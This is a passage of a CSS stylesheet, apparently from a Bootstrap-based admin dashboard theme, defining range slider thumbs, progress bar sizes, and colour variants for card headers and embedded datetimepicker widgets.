.custom-range.custom-range-white:focus {
outline: none;
}
.custom-range.custom-range-white:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(255, 255, 255, 0.25);
}
.custom-range.custom-range-white:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(255, 255, 255, 0.25);
}
.custom-range.custom-range-white:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(255, 255, 255, 0.25);
}
.custom-range.custom-range-white::-webkit-slider-thumb {
background-color: #ffffff;
}
.custom-range.custom-range-white::-webkit-slider-thumb:active {
background-color: white;
}
.custom-range.custom-range-white::-moz-range-thumb {
background-color: #ffffff;
}
.custom-range.custom-range-white::-moz-range-thumb:active {
background-color: white;
}
.custom-range.custom-range-white::-ms-thumb {
background-color: #ffffff;
}
.custom-range.custom-range-white::-ms-thumb:active {
background-color: white;
}
.custom-range.custom-range-gray:focus {
outline: none;
}
.custom-range.custom-range-gray:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(108, 117, 125, 0.25);
}
.custom-range.custom-range-gray:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(108, 117, 125, 0.25);
}
.custom-range.custom-range-gray:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(108, 117, 125, 0.25);
}
.custom-range.custom-range-gray::-webkit-slider-thumb {
background-color: #6c757d;
}
.custom-range.custom-range-gray::-webkit-slider-thumb:active {
background-color: #caced1;
}
.custom-range.custom-range-gray::-moz-range-thumb {
background-color: #6c757d;
}
.custom-range.custom-range-gray::-moz-range-thumb:active {
background-color: #caced1;
}
.custom-range.custom-range-gray::-ms-thumb {
background-color: #6c757d;
}
.custom-range.custom-range-gray::-ms-thumb:active {
background-color: #caced1;
}
.custom-range.custom-range-gray-dark:focus {
outline: none;
}
.custom-range.custom-range-gray-dark:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(52, 58, 64, 0.25);
}
.custom-range.custom-range-gray-dark:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(52, 58, 64, 0.25);
}
.custom-range.custom-range-gray-dark:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(52, 58, 64, 0.25);
}
.custom-range.custom-range-gray-dark::-webkit-slider-thumb {
background-color: #343a40;
}
.custom-range.custom-range-gray-dark::-webkit-slider-thumb:active {
background-color: #88939e;
}
.custom-range.custom-range-gray-dark::-moz-range-thumb {
background-color: #343a40;
}
.custom-range.custom-range-gray-dark::-moz-range-thumb:active {
background-color: #88939e;
}
.custom-range.custom-range-gray-dark::-ms-thumb {
background-color: #343a40;
}
.custom-range.custom-range-gray-dark::-ms-thumb:active {
background-color: #88939e;
}
.progress {
box-shadow: none;
border-radius: 1px;
}
.progress.vertical {
display: inline-block;
height: 200px;
margin-right: 10px;
position: relative;
width: 30px;
}
.progress.vertical > .progress-bar {
bottom: 0;
position: absolute;
width: 100%;
}
.progress.vertical.sm, .progress.vertical.progress-sm {
width: 20px;
}
.progress.vertical.xs, .progress.vertical.progress-xs {
width: 10px;
}
.progress.vertical.xxs, .progress.vertical.progress-xxs {
width: 3px;
}
.progress-group {
margin-bottom: 0.5rem;
}
.progress-sm {
height: 10px;
}
.progress-xs {
height: 7px;
}
.progress-xxs {
height: 3px;
}
.table tr > td .progress {
margin: 0;
}
.card-primary:not(.card-outline) > .card-header {
background-color: #007bff;
}
.card-primary:not(.card-outline) > .card-header,
.card-primary:not(.card-outline) > .card-header a {
color: #ffffff;
}
.card-primary:not(.card-outline) > .card-header a.active {
color: #1F2D3D;
}
.card-primary.card-outline {
border-top: 3px solid #007bff;
}
.card-primary.card-outline-tabs > .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card-primary.card-outline-tabs > .card-header a.active {
border-top: 3px solid #007bff;
}
.bg-primary .btn-tool,
.bg-gradient-primary .btn-tool,
.card-primary:not(.card-outline) .btn-tool {
color: rgba(255, 255, 255, 0.8);
}
.bg-primary .btn-tool:hover,
.bg-gradient-primary .btn-tool:hover,
.card-primary:not(.card-outline) .btn-tool:hover {
color: #ffffff;
}
.card.bg-primary .bootstrap-datetimepicker-widget .table td,
.card.bg-primary .bootstrap-datetimepicker-widget .table th,
.card.bg-gradient-primary .bootstrap-datetimepicker-widget .table td,
.card.bg-gradient-primary .bootstrap-datetimepicker-widget .table th {
border: none;
}
.card.bg-primary .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-primary .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-primary .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-primary .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-primary .bootstrap-datetimepicker-widget table td.second:hover,
.card.bg-gradient-primary .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gradient-primary .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gradient-primary .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gradient-primary .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gradient-primary .bootstrap-datetimepicker-widget table td.second:hover {
background: #0067d6;
color: #ffffff;
}
.card.bg-primary .bootstrap-datetimepicker-widget table td.today::before,
.card.bg-gradient-primary .bootstrap-datetimepicker-widget table td.today::before {
border-bottom-color: #ffffff;
}
.card.bg-primary .bootstrap-datetimepicker-widget table td.active,
.card.bg-primary .bootstrap-datetimepicker-widget table td.active:hover,
.card.bg-gradient-primary .bootstrap-datetimepicker-widget table td.active,
.card.bg-gradient-primary .bootstrap-datetimepicker-widget table td.active:hover {
background: #3395ff;
color: #ffffff;
}
.card-secondary:not(.card-outline) > .card-header {
background-color: #6c757d;
}
.card-secondary:not(.card-outline) > .card-header,
.card-secondary:not(.card-outline) > .card-header a {
color: #ffffff;
}
.card-secondary:not(.card-outline) > .card-header a.active {
color: #1F2D3D;
}
.card-secondary.card-outline {
border-top: 3px solid #6c757d;
}
.card-secondary.card-outline-tabs > .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card-secondary.card-outline-tabs > .card-header a.active {
border-top: 3px solid #6c757d;
}
.bg-secondary .btn-tool,
.bg-gradient-secondary .btn-tool,
.card-secondary:not(.card-outline) .btn-tool {
color: rgba(255, 255, 255, 0.8);
}
.bg-secondary .btn-tool:hover,
.bg-gradient-secondary .btn-tool:hover,
.card-secondary:not(.card-outline) .btn-tool:hover {
color: #ffffff;
}
.card.bg-secondary .bootstrap-datetimepicker-widget .table td,
.card.bg-secondary .bootstrap-datetimepicker-widget .table th,
.card.bg-gradient-secondary .bootstrap-datetimepicker-widget .table td,
.card.bg-gradient-secondary .bootstrap-datetimepicker-widget .table th {
border: none;
}
.card.bg-secondary .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-secondary .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-secondary .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-secondary .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-secondary .bootstrap-datetimepicker-widget table td.second:hover,
.card.bg-gradient-secondary .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gradient-secondary .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gradient-secondary .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gradient-secondary .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gradient-secondary .bootstrap-datetimepicker-widget table td.second:hover {
background: #596167;
color: #ffffff;
}
.card.bg-secondary .bootstrap-datetimepicker-widget table td.today::before,
.card.bg-gradient-secondary .bootstrap-datetimepicker-widget table td.today::before {
border-bottom-color: #ffffff;
}
.card.bg-secondary .bootstrap-datetimepicker-widget table td.active,
.card.bg-secondary .bootstrap-datetimepicker-widget table td.active:hover,
.card.bg-gradient-secondary .bootstrap-datetimepicker-widget table td.active,
.card.bg-gradient-secondary .bootstrap-datetimepicker-widget table td.active:hover {
background: #868e96;
color: #ffffff;
}
.card-success:not(.card-outline) > .card-header {
background-color: #28a745;
}
.card-success:not(.card-outline) > .card-header,
.card-success:not(.card-outline) > .card-header a {
color: #ffffff;
}
.card-success:not(.card-outline) > .card-header a.active {
color: #1F2D3D;
}
.card-success.card-outline {
border-top: 3px solid #28a745;
}
.card-success.card-outline-tabs > .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card-success.card-outline-tabs > .card-header a.active {
border-top: 3px solid #28a745;
}
.bg-success .btn-tool,
.bg-gradient-success .btn-tool,
.card-success:not(.card-outline) .btn-tool {
color: rgba(255, 255, 255, 0.8);
}
.bg-success .btn-tool:hover,
.bg-gradient-success .btn-tool:hover,
.card-success:not(.card-outline) .btn-tool:hover {
color: #ffffff;
}
.card.bg-success .bootstrap-datetimepicker-widget .table td,
.card.bg-success .bootstrap-datetimepicker-widget .table th,
.card.bg-gradient-success .bootstrap-datetimepicker-widget .table td,
.card.bg-gradient-success .bootstrap-datetimepicker-widget .table th {
border: none;
}
.card.bg-success .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-success .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-success .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-success .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-success .bootstrap-datetimepicker-widget table td.second:hover,
.card.bg-gradient-success .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gradient-success .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gradient-success .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gradient-success .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gradient-success .bootstrap-datetimepicker-widget table td.second:hover {
background: #208637;
color: #ffffff;
}
.card.bg-success .bootstrap-datetimepicker-widget table td.today::before,
.card.bg-gradient-success .bootstrap-datetimepicker-widget table td.today::before {
border-bottom-color: #ffffff;
}
.card.bg-success .bootstrap-datetimepicker-widget table td.active,
.card.bg-success .bootstrap-datetimepicker-widget table td.active:hover,
.card.bg-gradient-success .bootstrap-datetimepicker-widget table td.active,
.card.bg-gradient-success .bootstrap-datetimepicker-widget table td.active:hover {
background: #34ce57;
color: #ffffff;
}
.card-info:not(.card-outline) > .card-header {
background-color: #17a2b8;
}
.card-info:not(.card-outline) > .card-header,
.card-info:not(.card-outline) > .card-header a {
color: #ffffff;
}
.card-info:not(.card-outline) > .card-header a.active {
color: #1F2D3D;
}
.card-info.card-outline {
border-top: 3px solid #17a2b8;
}
.card-info.card-outline-tabs > .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card-info.card-outline-tabs > .card-header a.active {
border-top: 3px solid #17a2b8;
}
.bg-info .btn-tool,
.bg-gradient-info .btn-tool,
.card-info:not(.card-outline) .btn-tool {
color: rgba(255, 255, 255, 0.8);
}
.bg-info .btn-tool:hover,
.bg-gradient-info .btn-tool:hover,
.card-info:not(.card-outline) .btn-tool:hover {
color: #ffffff;
}
.card.bg-info .bootstrap-datetimepicker-widget .table td,
.card.bg-info .bootstrap-datetimepicker-widget .table th,
.card.bg-gradient-info .bootstrap-datetimepicker-widget .table td,
.card.bg-gradient-info .bootstrap-datetimepicker-widget .table th {
border: none;
}
.card.bg-info .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-info .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-info .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-info .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-info .bootstrap-datetimepicker-widget table td.second:hover,
.card.bg-gradient-info .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gradient-info .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gradient-info .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gradient-info .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gradient-info .bootstrap-datetimepicker-widget table td.second:hover {
background: #128294;
color: #ffffff;
}
.card.bg-info .bootstrap-datetimepicker-widget table td.today::before,
.card.bg-gradient-info .bootstrap-datetimepicker-widget table td.today::before {
border-bottom-color: #ffffff;
}
.card.bg-info .bootstrap-datetimepicker-widget table td.active,
.card.bg-info .bootstrap-datetimepicker-widget table td.active:hover,
.card.bg-gradient-info .bootstrap-datetimepicker-widget table td.active,
.card.bg-gradient-info .bootstrap-datetimepicker-widget table td.active:hover {
background: #1fc8e3;
color: #ffffff;
}
.card-warning:not(.card-outline) > .card-header {
background-color: #ffc107;
}
.card-warning:not(.card-outline) > .card-header,
.card-warning:not(.card-outline) > .card-header a {
color: #1F2D3D;
}
.card-warning:not(.card-outline) > .card-header a.active {
color: #1F2D3D;
}
.card-warning.card-outline {
border-top: 3px solid #ffc107;
}
.card-warning.card-outline-tabs > .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card-warning.card-outline-tabs > .card-header a.active {
border-top: 3px solid #ffc107;
}
.bg-warning .btn-tool,
.bg-gradient-warning .btn-tool,
.card-warning:not(.card-outline) .btn-tool {
color: rgba(31, 45, 61, 0.8);
}
.bg-warning .btn-tool:hover,
.bg-gradient-warning .btn-tool:hover,
.card-warning:not(.card-outline) .btn-tool:hover {
color: #1F2D3D;
}
.card.bg-warning .bootstrap-datetimepicker-widget .table td,
.card.bg-warning .bootstrap-datetimepicker-widget .table th,
.card.bg-gradient-warning .bootstrap-datetimepicker-widget .table td,
.card.bg-gradient-warning .bootstrap-datetimepicker-widget .table th {
border: none;
}
.card.bg-warning .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-warning .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-warning .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-warning .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-warning .bootstrap-datetimepicker-widget table td.second:hover,
.card.bg-gradient-warning .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gradient-warning .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gradient-warning .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gradient-warning .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gradient-warning .bootstrap-datetimepicker-widget table td.second:hover {
background: #dda600;
color: #1F2D3D;
}
.card.bg-warning .bootstrap-datetimepicker-widget table td.today::before,
.card.bg-gradient-warning .bootstrap-datetimepicker-widget table td.today::before {
border-bottom-color: #1F2D3D;
}
.card.bg-warning .bootstrap-datetimepicker-widget table td.active,
.card.bg-warning .bootstrap-datetimepicker-widget table td.active:hover,
.card.bg-gradient-warning .bootstrap-datetimepicker-widget table td.active,
.card.bg-gradient-warning .bootstrap-datetimepicker-widget table td.active:hover {
background: #ffce3a;
color: #1F2D3D;
}
.card-danger:not(.card-outline) > .card-header {
background-color: #dc3545;
}
.card-danger:not(.card-outline) > .card-header,
.card-danger:not(.card-outline) > .card-header a {
color: #ffffff;
}
.card-danger:not(.card-outline) > .card-header a.active {
color: #1F2D3D;
}
.card-danger.card-outline {
border-top: 3px solid #dc3545;
}
.card-danger.card-outline-tabs > .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card-danger.card-outline-tabs > .card-header a.active {
border-top: 3px solid #dc3545;
}
.bg-danger .btn-tool,
.bg-gradient-danger .btn-tool,
.card-danger:not(.card-outline) .btn-tool {
color: rgba(255, 255, 255, 0.8);
}
.bg-danger .btn-tool:hover,
.bg-gradient-danger .btn-tool:hover,
.card-danger:not(.card-outline) .btn-tool:hover {
color: #ffffff;
}
.card.bg-danger .bootstrap-datetimepicker-widget .table td,
.card.bg-danger .bootstrap-datetimepicker-widget .table th,
.card.bg-gradient-danger .bootstrap-datetimepicker-widget .table td,
.card.bg-gradient-danger .bootstrap-datetimepicker-widget .table th {
border: none;
}
.card.bg-danger .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-danger .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-danger .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-danger .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-danger .bootstrap-datetimepicker-widget table td.second:hover,
.card.bg-gradient-danger .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gradient-danger .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gradient-danger .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gradient-danger .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gradient-danger .bootstrap-datetimepicker-widget table td.second:hover {
background: #c62232;
color: #ffffff;
}
.card.bg-danger .bootstrap-datetimepicker-widget table td.today::before,
.card.bg-gradient-danger .bootstrap-datetimepicker-widget table td.today::before {
border-bottom-color: #ffffff;
}
.card.bg-danger .bootstrap-datetimepicker-widget table td.active,
.card.bg-danger .bootstrap-datetimepicker-widget table td.active:hover,
.card.bg-gradient-danger .bootstrap-datetimepicker-widget table td.active,
.card.bg-gradient-danger .bootstrap-datetimepicker-widget table td.active:hover {
background: #e4606d;
color: #ffffff;
}
.card-light:not(.card-outline) > .card-header {
background-color: #f8f9fa;
}
.card-light:not(.card-outline) > .card-header,
.card-light:not(.card-outline) > .card-header a {
color: #1F2D3D;
}
.card-light:not(.card-outline) > .card-header a.active {
color: #1F2D3D;
}
.card-light.card-outline {
border-top: 3px solid #f8f9fa;
}
.card-light.card-outline-tabs > .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card-light.card-outline-tabs > .card-header a.active {
border-top: 3px solid #f8f9fa;
}
.bg-light .btn-tool,
.bg-gradient-light .btn-tool,
.card-light:not(.card-outline) .btn-tool {
color: rgba(31, 45, 61, 0.8);
}
.bg-light .btn-tool:hover,
.bg-gradient-light .btn-tool:hover,
.card-light:not(.card-outline) .btn-tool:hover {
color: #1F2D3D;
}
.card.bg-light .bootstrap-datetimepicker-widget .table td,
.card.bg-light .bootstrap-datetimepicker-widget .table th,
.card.bg-gradient-light .bootstrap-datetimepicker-widget .table td,
.card.bg-gradient-light .bootstrap-datetimepicker-widget .table th {
border: none;
}
.card.bg-light .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-light .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-light .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-light .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-light .bootstrap-datetimepicker-widget table td.second:hover,
.card.bg-gradient-light .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gradient-light .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gradient-light .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gradient-light .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gradient-light .bootstrap-datetimepicker-widget table td.second:hover {
background: #e0e5e9;
color: #1F2D3D;
}
.card.bg-light .bootstrap-datetimepicker-widget table td.today::before,
.card.bg-gradient-light .bootstrap-datetimepicker-widget table td.today::before {
border-bottom-color: #1F2D3D;
}
.card.bg-light .bootstrap-datetimepicker-widget table td.active,
.card.bg-light .bootstrap-datetimepicker-widget table td.active:hover,
.card.bg-gradient-light .bootstrap-datetimepicker-widget table td.active,
.card.bg-gradient-light .bootstrap-datetimepicker-widget table td.active:hover {
background: white;
color: #1F2D3D;
}
.card-dark:not(.card-outline) > .card-header {
background-color: #343a40;
}
.card-dark:not(.card-outline) > .card-header,
.card-dark:not(.card-outline) > .card-header a {
color: #ffffff;
}
.card-dark:not(.card-outline) > .card-header a.active {
color: #1F2D3D;
}
.card-dark.card-outline {
border-top: 3px solid #343a40;
}
.card-dark.card-outline-tabs > .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card-dark.card-outline-tabs > .card-header a.active {
border-top: 3px solid #343a40;
}
.bg-dark .btn-tool,
.bg-gradient-dark .btn-tool,
.card-dark:not(.card-outline) .btn-tool {
color: rgba(255, 255, 255, 0.8);
}
.bg-dark .btn-tool:hover,
.bg-gradient-dark .btn-tool:hover,
.card-dark:not(.card-outline) .btn-tool:hover {
color: #ffffff;
}
.card.bg-dark .bootstrap-datetimepicker-widget .table td,
.card.bg-dark .bootstrap-datetimepicker-widget .table th,
.card.bg-gradient-dark .bootstrap-datetimepicker-widget .table td,
.card.bg-gradient-dark .bootstrap-datetimepicker-widget .table th {
border: none;
}
.card.bg-dark .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-dark .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-dark .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-dark .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-dark .bootstrap-datetimepicker-widget table td.second:hover,
.card.bg-gradient-dark .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gradient-dark .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gradient-dark .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gradient-dark .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gradient-dark .bootstrap-datetimepicker-widget table td.second:hover {
background: #222629;
color: #ffffff;
}
.card.bg-dark .bootstrap-datetimepicker-widget table td.today::before,
.card.bg-gradient-dark .bootstrap-datetimepicker-widget table td.today::before {
border-bottom-color: #ffffff;
}
.card.bg-dark .bootstrap-datetimepicker-widget table td.active,
.card.bg-dark .bootstrap-datetimepicker-widget table td.active:hover,
.card.bg-gradient-dark .bootstrap-datetimepicker-widget table td.active,
.card.bg-gradient-dark .bootstrap-datetimepicker-widget table td.active:hover {
background: #4b545c;
color: #ffffff;
}
.card-lightblue:not(.card-outline) > .card-header {
background-color: #3c8dbc;
}
.card-lightblue:not(.card-outline) > .card-header,
.card-lightblue:not(.card-outline) > .card-header a {
color: #ffffff;
}
.card-lightblue:not(.card-outline) > .card-header a.active {
color: #1F2D3D;
}
.card-lightblue.card-outline {
border-top: 3px solid #3c8dbc;
}
.card-lightblue.card-outline-tabs > .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card-lightblue.card-outline-tabs > .card-header a.active {
border-top: 3px solid #3c8dbc;
}
.bg-lightblue .btn-tool,
.bg-gradient-lightblue .btn-tool,
.card-lightblue:not(.card-outline) .btn-tool {
color: rgba(255, 255, 255, 0.8);
}
.bg-lightblue .btn-tool:hover,
.bg-gradient-lightblue .btn-tool:hover,
.card-lightblue:not(.card-outline) .btn-tool:hover {
color: #ffffff;
}
.card.bg-lightblue .bootstrap-datetimepicker-widget .table td,
.card.bg-lightblue .bootstrap-datetimepicker-widget .table th,
.card.bg-gradient-lightblue .bootstrap-datetimepicker-widget .table td,
.card.bg-gradient-lightblue .bootstrap-datetimepicker-widget .table th {
border: none;
}
.card.bg-lightblue .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-lightblue .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-lightblue .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-lightblue .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-lightblue .bootstrap-datetimepicker-widget table td.second:hover,
.card.bg-gradient-lightblue .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gradient-lightblue .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gradient-lightblue .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gradient-lightblue .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gradient-lightblue .bootstrap-datetimepicker-widget table td.second:hover {
background: #32769d;
color: #ffffff;
}
.card.bg-lightblue .bootstrap-datetimepicker-widget table td.today::before,
.card.bg-gradient-lightblue .bootstrap-datetimepicker-widget table td.today::before {
border-bottom-color: #ffffff;
}
.card.bg-lightblue .bootstrap-datetimepicker-widget table td.active,
.card.bg-lightblue .bootstrap-datetimepicker-widget table td.active:hover,
.card.bg-gradient-lightblue .bootstrap-datetimepicker-widget table td.active,
.card.bg-gradient-lightblue .bootstrap-datetimepicker-widget table td.active:hover {
background: #5fa4cc;
color: #ffffff;
}
.card-navy:not(.card-outline) > .card-header {
background-color: #001f3f;
}
.card-navy:not(.card-outline) > .card-header,
.card-navy:not(.card-outline) > .card-header a {
color: #ffffff;
}
.card-navy:not(.card-outline) > .card-header a.active {
color: #1F2D3D;
}
.card-navy.card-outline {
border-top: 3px solid #001f3f;
}
.card-navy.card-outline-tabs > .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card-navy.card-outline-tabs > .card-header a.active {
border-top: 3px solid #001f3f;
}
.bg-navy .btn-tool,
.bg-gradient-navy .btn-tool,
.card-navy:not(.card-outline) .btn-tool {
color: rgba(255, 255, 255, 0.8);
}
.bg-navy .btn-tool:hover,
.bg-gradient-navy .btn-tool:hover,
.card-navy:not(.card-outline) .btn-tool:hover {
color: #ffffff;
}
.card.bg-navy .bootstrap-datetimepicker-widget .table td,
.card.bg-navy .bootstrap-datetimepicker-widget .table th,
.card.bg-gradient-navy .bootstrap-datetimepicker-widget .table td,
.card.bg-gradient-navy .bootstrap-datetimepicker-widget .table th {
border: none;
}
.card.bg-navy .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-navy .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-navy .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-navy .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-navy .bootstrap-datetimepicker-widget table td.second:hover,
.card.bg-gradient-navy .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gradient-navy .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gradient-navy .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gradient-navy .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gradient-navy .bootstrap-datetimepicker-widget table td.second:hover {
background: #000b16;
color: #ffffff;
}
.card.bg-navy .bootstrap-datetimepicker-widget table td.today::before,
.card.bg-gradient-navy .bootstrap-datetimepicker-widget table td.today::before {
border-bottom-color: #ffffff;
}
.card.bg-navy .bootstrap-datetimepicker-widget table td.active,
.card.bg-navy .bootstrap-datetimepicker-widget table td.active:hover,
.card.bg-gradient-navy .bootstrap-datetimepicker-widget table td.active,
.card.bg-gradient-navy .bootstrap-datetimepicker-widget table td.active:hover {
background: #003872;
color: #ffffff;
}
.card-olive:not(.card-outline) > .card-header {
background-color: #3d9970;
}
.card-olive:not(.card-outline) > .card-header,
.card-olive:not(.card-outline) > .card-header a {
color: #ffffff;
}
.card-olive:not(.card-outline) > .card-header a.active {
color: #1F2D3D;
}
.card-olive.card-outline {
border-top: 3px solid #3d9970;
}
.card-olive.card-outline-tabs > .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card-olive.card-outline-tabs > .card-header a.active {
border-top: 3px solid #3d9970;
}
.bg-olive .btn-tool,
.bg-gradient-olive .btn-tool,
.card-olive:not(.card-outline) .btn-tool {
color: rgba(255, 255, 255, 0.8);
}
.bg-olive .btn-tool:hover,
.bg-gradient-olive .btn-tool:hover,
.card-olive:not(.card-outline) .btn-tool:hover {
color: #ffffff;
}
.card.bg-olive .bootstrap-datetimepicker-widget .table td,
.card.bg-olive .bootstrap-datetimepicker-widget .table th,
.card.bg-gradient-olive .bootstrap-datetimepicker-widget .table td,
.card.bg-gradient-olive .bootstrap-datetimepicker-widget .table th {
border: none;
}
.card.bg-olive .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-olive .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-olive .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-olive .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-olive .bootstrap-datetimepicker-widget table td.second:hover,
.card.bg-gradient-olive .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gradient-olive .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gradient-olive .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gradient-olive .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gradient-olive .bootstrap-datetimepicker-widget table td.second:hover {
background: #317c5b;
color: #ffffff;
}
.card.bg-olive .bootstrap-datetimepicker-widget table td.today::before,
.card.bg-gradient-olive .bootstrap-datetimepicker-widget table td.today::before {
border-bottom-color: #ffffff;
}
.card.bg-olive .bootstrap-datetimepicker-widget table td.active,
.card.bg-olive .bootstrap-datetimepicker-widget table td.active:hover,
.card.bg-gradient-olive .bootstrap-datetimepicker-widget table td.active,
.card.bg-gradient-olive .bootstrap-datetimepicker-widget table td.active:hover {
background: #50b98a;
color: #ffffff;
}
.card-lime:not(.card-outline) > .card-header {
background-color: #01ff70;
}
.card-lime:not(.card-outline) > .card-header,
.card-lime:not(.card-outline) > .card-header a {
color: #1F2D3D;
}
.card-lime:not(.card-outline) > .card-header a.active {
color: #1F2D3D;
}
.card-lime.card-outline {
border-top: 3px solid #01ff70;
}
.card-lime.card-outline-tabs > .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card-lime.card-outline-tabs > .card-header a.active {
border-top: 3px solid #01ff70;
}
.bg-lime .btn-tool,
.bg-gradient-lime .btn-tool,
.card-lime:not(.card-outline) .btn-tool {
color: rgba(31, 45, 61, 0.8);
}
.bg-lime .btn-tool:hover,
.bg-gradient-lime .btn-tool:hover,
.card-lime:not(.card-outline) .btn-tool:hover {
color: #1F2D3D;
}
.card.bg-lime .bootstrap-datetimepicker-widget .table td,
.card.bg-lime .bootstrap-datetimepicker-widget .table th,
.card.bg-gradient-lime .bootstrap-datetimepicker-widget .table td,
.card.bg-gradient-lime .bootstrap-datetimepicker-widget .table th {
border: none;
}
.card.bg-lime .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
